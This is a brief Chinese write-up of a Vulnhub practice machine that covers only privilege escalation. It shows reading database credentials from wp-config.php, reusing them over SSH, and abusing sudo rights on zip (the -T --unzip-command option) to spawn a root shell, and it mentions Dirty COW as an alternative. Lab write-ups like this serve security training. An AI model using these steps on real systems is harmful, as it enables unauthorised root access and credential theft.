Vulnhub靶机第十四关

由于本关于通关方式与第九关相似,
所以本关获得shell部分请参考第九关。
本关只提供提权部分。

输入shell
输入:python -c’import pty;pty.spawn("/bin/bash")’
得到交互式的shell
在home目录下查看wordpress 配置文件 wp-config.php
得到账户密码
尝试ssh连接
连接成功输入sudo -l查看目前用户可执行与无法执行的指令
Vulnhub靶机第十四关_第1张图片
Vulnhub靶机第十四关_第2张图片
Vulnhub靶机第十四关_第3张图片
Vulnhub靶机第十四关_第4张图片
这里表明当前用户 zico 可以利用root权限无密码执行 tar 和 zip 命令
这里可以利用 touch exploit 创建一个随机文件,并用 zip 命令进行压缩
sudo zip exploit.zip exploit -T --unzip-command=“python -c 'import pty; pty.spawn(”/bin/sh")’"
-T 检查文件的完整性。这个参数可以让他执行下一个参数 --unzip-command,在这个参数中写入一个python的交互shell
完成提权
Vulnhub靶机第十四关_第5张图片
或者进行脏牛提权
查看flag
Vulnhub靶机第十四关_第6张图片
通过完成

你可能感兴趣的:(Vulnhub靶机第十四关,安全)